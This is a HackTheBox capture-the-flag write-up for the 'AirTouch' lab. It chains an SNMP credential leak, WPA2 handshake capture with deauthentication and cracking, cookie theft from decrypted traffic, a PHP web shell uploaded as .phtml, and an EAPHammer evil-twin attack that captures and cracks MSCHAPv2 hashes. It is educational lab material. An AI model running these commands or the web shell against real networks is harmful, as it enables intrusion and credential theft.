AIRTOUCH
TARGET OS: LINUX / HYBRID | AUTHOR: LEANDROS
AirTouch is a massive, real-world hybrid infrastructure simulation on HackTheBox. The intrusion required compromising multiple isolated network segments. I began by exploiting a leaky SNMP service to gain initial SSH access. From there, I escalated to a local root container, enabling me to capture and crack a WPA2-PSK WiFi handshake. After pivoting into the internal network using a Chisel SOCKS proxy, I performed a PCAP analysis to hijack an admin cookie. This led to a web shell and further lateral movement. Finally, I executed a sophisticated Rogue Access Point (Evil Twin) attack against a WPA2-Enterprise network using EAPHammer, cracking the captured MSCHAPv2 hashes to secure full administrative control over the central RADIUS host. Here is my complete mission log.
PHASE 1: RECONNAISSANCE & SNMP LEAK
I initiated the engagement with standard TCP and UDP Nmap scans to map the target's external attack surface.
nmap -sCV -p22 <IP>
nmap -sU --top-ports 100 -v <IP>PORT STATE SERVICE
68/udp open|filtered dhcpc
161/udp open snmp
While TCP only revealed SSH, the UDP scan exposed port 161 (SNMP). Simple Network Management Protocol is used to monitor network devices, but if left accessible with default community strings, it leaks massive amounts of system data. I used snmp-check to dump the Management Information Base (MIB) tree.
snmp-check <IP>[*] System information:
Host IP address : 10.129.9.137
Hostname : Consultant
Description : "The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it after use it)"
The administrators explicitly stored a plaintext password in the device description field: RxBlZhLmOkacNWScmZ6D. I used this password to SSH into the machine as the consultant user. Running sudo -l revealed I had NOPASSWD: ALL permissions, allowing me to instantly execute sudo su and become root! However, I quickly realized I was trapped inside an isolated container. I needed to pivot.
PHASE 2: WPA2-PSK CRACKING & NETWORK PIVOT
While exploring the container as root, I noticed wireless auditing tools like aircrack-ng were installed, and a wireless interface (wlan0) was available. This machine was acting as a WiFi client/monitor!
[!] EXPLOIT STRATEGY: WPA2 4-WAY HANDSHAKE CAPTURE
In WPA2-PSK networks, the actual password is never sent over the air. Instead, clients and routers negotiate a cryptographic key using a 4-Way Handshake (EAPOL). By putting our wireless card in monitor mode, capturing this handshake, and forcing clients to disconnect (deauthentication), we can capture the cryptographic hashes and crack them offline using a dictionary attack.
I put the interface into monitor mode and used airodump-ng to discover a target network: AirTouch-Inte (BSSID: F0:9F:C2:A3:F1:A7). I targeted this network and used aireplay-ng to force client disconnections, successfully capturing the WPA handshake.
airodump-ng -c 6 --bssid F0:9F:C2:A3:F1:A7 -w airtouch_capture wlan0mon
aireplay-ng -0 10 -a F0:9F:C2:A3:F1:A7 wlan0mon
With the .cap file generated, I downloaded the rockyou.txt wordlist to the container and ran aircrack-ng against the capture file. It successfully cracked the hash, revealing the WiFi password: challenge.
I generated a wpa_supplicant configuration file, connected to the network via the wlan1 interface, and requested an IP address via DHCP, placing me inside the 192.168.3.0/24 subnet.
wpa_passphrase "AirTouch-Internet" "challenge" > /tmp/wifi.conf
wpa_supplicant -i wlan1 -c /tmp/wifi.conf -B
dhclient -v wlan1
PHASE 3: PCAP ANALYSIS & WEB EXPLOITATION
Now on the internal WiFi network, I used a Chisel SOCKS proxy to route my attacker machine's traffic into the subnet. Scanning the gateway (192.168.3.1) revealed an HTTP login panel.
Instead of brute-forcing the panel, I went back to my airodump-ng capture file. Since I now had the plaintext WiFi password, I could use airdecap-ng to decrypt the raw wireless frames and analyze the internal HTTP traffic!
airdecap-ng -e "AirTouch-Internet" -p "challenge" captura-01.cap
I opened the decrypted PCAP in Wireshark, followed the HTTP streams, and found a cleartext session cookie for an authenticated user. I intercepted my browser request, injected the stolen cookie, and bypassed the login page.
By manually altering the role parameter in the cookie to admin, I unlocked a hidden file upload feature. The server blocked .php files, but it allowed .phtml extensions!
<?php echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>"; ?>
I uploaded the webshell and used it to read the login.php source code (/uploads/shell1.phtml?cmd=cat ../login.php). The source code contained hardcoded credentials: user : JunDRDZKHDnpkpDDvay. I SSH'd into the gateway (192.168.3.1) as this user. Checking sudo -l revealed I was root in yet another container!
PHASE 4: WPA2-ENTERPRISE & ROGUE AP (EVIL TWIN)
In the root directory of this second container, I found a script named send_certs.sh containing credentials for the user remote (xGgWEwqUpfoOVsLeROeG), attempting to connect to 10.10.10.1.
Scanning the wireless environment again with iwlist revealed a new 5GHz network: AirTouch-Office. Unlike the previous network, this one used WPA2-Enterprise (802.1X) authentication.
[!] EXPLOIT STRATEGY: EAPHAMMER ROGUE AP (EVIL TWIN)
WPA2-Enterprise does not use a single shared password. Users authenticate individually against a RADIUS server, usually via PEAP-MSCHAPv2. Offline cracking won't work. Instead, we must perform an "Evil Twin" attack using a tool like EAPHammer. By spinning up a fake access point with the exact same SSID and using valid CA certificates (which we found on the compromised system), we can trick corporate devices into connecting to us. When they attempt to log in, our fake AP captures their MSCHAPv2 challenge-response hashes!
I extracted the necessary ca.crt, server.crt, and server.key files from the compromised host and imported them into the eaphammer tool.
./eaphammer --cert-wizard import --ca-cert /root/certs1/ca.crt --server-cert /root/certs1/server.crt --private-key /root/certs1/server.key
I then launched the Evil Twin attack, cloning the AirTouch-Office network.
./eaphammer -i wlan2 --bssid AC:8B:A9:F3:A1:13 --essid "AirTouch-Office" --channel 44 --auth wpa-eap --creds
Almost immediately, an automated client attempted to connect to my rogue access point. EAPHammer captured the NETNTLM hash for the user r4ulcl! I saved the hash and passed it to John the Ripper.
john --format=netntlm hash --wordlist=rockyou.txtJohn rapidly cracked the hash, revealing the password: laboratory.
PHASE 5: FINAL PIVOT & HOSTAPD ESCALATION
With a valid set of enterprise credentials, I crafted a custom wpa_supplicant config to connect to the real AirTouch-Office network, specifying PEAP and MSCHAPV2 authentication. Once connected, I received an IP address (10.10.10.74).
From inside this highly restricted network segment, I utilized the SSH credentials I found earlier to log into the main RADIUS/Host AP server (10.10.10.1) as the user remote.
cat /etc/hostapd/hostapd_wpe.eap_user# WPE - DO NOT REMOVE - These entries are specifically in here
* PEAP,TTLS,TLS,FAST
"AirTouch\r4ulcl" MSCHAPV2 "laboratory" [2]
"admin" MSCHAPV2 "xMJpzXt4D9ouMuL3JJsMriF7KZozm7" [2]
Because this server was previously acting as a HostAPD-WPE (Wireless Pwnage Edition) node, it was logging all authenticated user credentials in absolute plaintext! I extracted the password for the admin user: xMJpzXt4D9ouMuL3JJsMriF7KZozm7.
I used su admin to switch to the admin user. Checking my privileges with sudo -l, I discovered I possessed full, unrestricted NOPASSWD: ALL rights on the primary host.
sudo su
whoamiroot
I was dropped into a root shell on the central management node. I retrieved the final root.txt flag, bringing the entire hybrid infrastructure to its knees. System Compromised.